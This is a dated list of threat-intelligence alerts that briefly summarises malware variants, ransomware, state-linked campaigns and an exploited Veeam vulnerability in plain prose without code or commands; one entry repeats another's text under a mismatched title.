ALERTS 2014 OCTOBER HOME AI APT BOTNET CAMPAIGN CRIME CRYPTOCURRENCY EXPLOIT HACKING GROUP OPERATION PHISHING RANSOM SPAM VIRUS VULNEREBILITY
2024 March(16) April(92) May(99) June(94) July(88) August(112) SEPTEMBER(67) October(13) November(80) December(6) 2025 January(36) February(50) March(51)
DATE |
NAME |
CATEGORY |
SUBCATE |
INFO |
1.11.24 | New variant of FakeCall Android malware | ALERTS | VIRUS | A new variant of the Android malware called FakeCall has been observed in the wild. The attackers behind this malware employ voice phishing (vishing) techniques in order to trick victims into disclosing sensitive information such as credentials or banking information. While abusing the Android Accessibility Service, FakeCall grants the attackers a considerable remote control over the infected devices, allowing them to simulate user actions, intercept incoming or outgoing calls, manipulate the devices' camera, etc. FakeCall also allows for collection of user contacts, call logs or SMS messages from the compromised devices. The collected data is then forwarded to the C2 servers controlled by the attackers. |
1.11.24 | Sauron - a new ransomware variant in the wild | ALERTS | RANSOM | Sauron is a new ransomware variant recently found in the wild. The malware appends ".sauron" extension to the encrypted files. The ransom note is dropped in form of a text file called "#HowToRecover.txt" on the affected machines. The attackers request to contact them via the provided email address and the ransom is demanded in form of Bitcoin cryptocurrency payment. The malware is also able to change the desktop wallpaper to inform the victims that the files have been encrypted. Sauron has the functionality to delete Volume Shadow Copies from the infected machines in an effort to prevent the victims from recovering the data. |
1.11.24 | UNC5812 campaigns against Ukraine with Android and Windows malware | ALERTS | GROUP | A recent report highlighted activity attributed to a suspected Russian threat actor identified as UNC5812. The activity involved distributions of Android and Windows malware targeting Ukranian military recruits. The intent of the campaign was not only to engage in espionage but also attempt to negatively influence support for pro-Ukranian forces. |
1.11.24 | A possible Bumblebee Loader resurgence | ALERTS | VIRUS | A new campaign delivering the Bumblebee loader has been reported this month. Bumblebee is a highly sophisticated downloader variant discovered initially back in 2022. The malware has been spread across a multitude of malicious campaigns and used for the delivery and execution of miscellaneous payloads such as Cobalt Strike, ransomware, etc. Since the botnet disruption campaign called Operation Endgame, conducted by Europol in May 2024, Bumblebee has not been observed up until now. The new Bumblebee infection chain incorporates malicious .zip archives, PowerShell commands, .lnk and .msi files, all leading to payloads deployed in form of .dll binaries. |
1.11.24 | CVE-2024-40711 - Veeam Backup and Replication deserialization vulnerability exploited by ransomware actors | ALERTS | VULNEREBILITY | CVE-2024-40711 is a recently disclosed critical (CVSS score 9.8) deserialization vulnerability affecting the Veeam Backup and Replication software in version 12.1.2.172 or older. If successfully exploited the flaw might provide unauthenticated attackers with remote code execution (RCE) on the vulnerable systems. The vulnerability has been reported as being exploited in the wild by the Akira and Fog ransomware threat groups. Following those reports, CVE-2024-40711 has also been added to the CISA's Known Exploited Vulnerabilities (KEV) catalog. |
1.11.24 | Malicious "Lounge Pass" app targets air travelers in India | ALERTS | VIRUS | A campaign involving a malicious Android app called "Lounge Pass" targeting air travelers at Indian airports has been observed. Distributed through fake domains, the app intercepts and forwards SMS messages from victims' devices to cybercriminals, leading to significant financial losses. The scammers exploited an exposed Firebase endpoint to store the stolen SMS messages. To prevent data theft, it’s recommended to download apps only from official stores and to refrain from granting SMS access to travel or lounge apps. |
1.11.24 | Adware Campaign uses Fake CAPTCHA to deliver Lumma and Amadey malware | ALERTS | VIRUS | Threat actors are increasingly using fake CAPTCHA as an initial attack vector. A recent adware campaign is targeting online users by presenting them with fake CAPTCHA or update prompts. Attackers are leveraging ad networks to redirect victims to compromised sites that host these social engineering lures. Once lured, victims are triggering PowerShell commands that deploy credential-stealing malware such as Lumma which harvests cryptocurrency wallets, passwords and browser data, or Amadey, which gathers credentials and can deploy Remcos RAT. |
1.11.24 | TeamTNT targets cloud-native environments in new Cryptojacking campaign | ALERTS | CRYPTOCURRENCY | A new campaign by the cryptojacking group TeamTNT has been reported targeting cloud-native environments for cryptocurrency mining and reselling compromised servers. They exploit exposed Docker daemons to deploy Sliver malware, cyber worms and cryptominers, gaining access through exposed Docker ports and using compromised Docker Hub accounts to spread malware and rent out victims' computational power. |
1.11.24 | Rekoobe malware found potentially targeting TradingView users | ALERTS | VIRUS | An open directory has been discovered hosting Rekoobe malware, potentially aimed at targeting TradingView users along with other cyber espionage campaigns. Rekoobe is a versatile backdoor previously deployed by APT31 and other adversaries engaged in cyber espionage and data theft. Based partially on the publicly available Tiny SHell, the malware has evolved to incorporate enhanced encryption techniques and unique command-and-control configurations, making analysis and detection more difficult. |
1.11.24 | Daggerfly targets Taiwanese entities with new CloudScout Toolset | ALERTS | APT | China-linked threat actor Daggerfly (also known as Evasive Panda) has been reported targeting a government entity and a religious organization in Taiwan with a previously undocumented post-compromise toolset called CloudScout. This toolset can retrieve data from various cloud services by leveraging stolen web session cookies. Additionally, CloudScout integrates seamlessly with MgBot, Evasive Panda's signature malware framework. |
1.11.24 | Daggerfly targets Taiwanese entities with new CloudScout Toolset | ALERTS | VIRUS | Researchers have recently uncovered a malicious campaign spreading the XWorm RAT trojan via fake emails posing as official communications from Namirial, a software and service company. The emails prompt users to open a password-protected PDF, and if it fails, directs them to a Dropbox link that downloads a ZIP file containing a URL that would connect to the attacker's servers and download additional malicious scripts, enabling control over the victim's machine. |
1.11.24 | Phishing Campaign Distributing XWorm RAT | ALERTS | PHISHING | Researchers have recently uncovered a malicious campaign spreading the XWorm RAT trojan via fake emails posing as official communications from Namirial, a software and service company. The emails prompt users to open a password-protected PDF, and if it fails, directs them to a Dropbox link that downloads a ZIP file containing a URL that would connect to the attacker's servers and download additional malicious scripts, enabling control over the victim's machine. |
1.11.24 | HeptaX Cyberattack Operations | ALERTS | OPERATION | A researcher recently identified a multi-stage cyberattack targeting the healthcare industry, initiated through a ZIP file containing a malicious shortcut (.lnk) file, likely spread via phishing emails. When executed, the LNK file runs a PowerShell command that downloads additional payloads including scripts and BAT files from a remote server. These scripts create a new administrative user account and alter RDP settings to reduce authentication requirements, allowing attackers to gain remote access for further malicious actions such as data theft and malware installation. |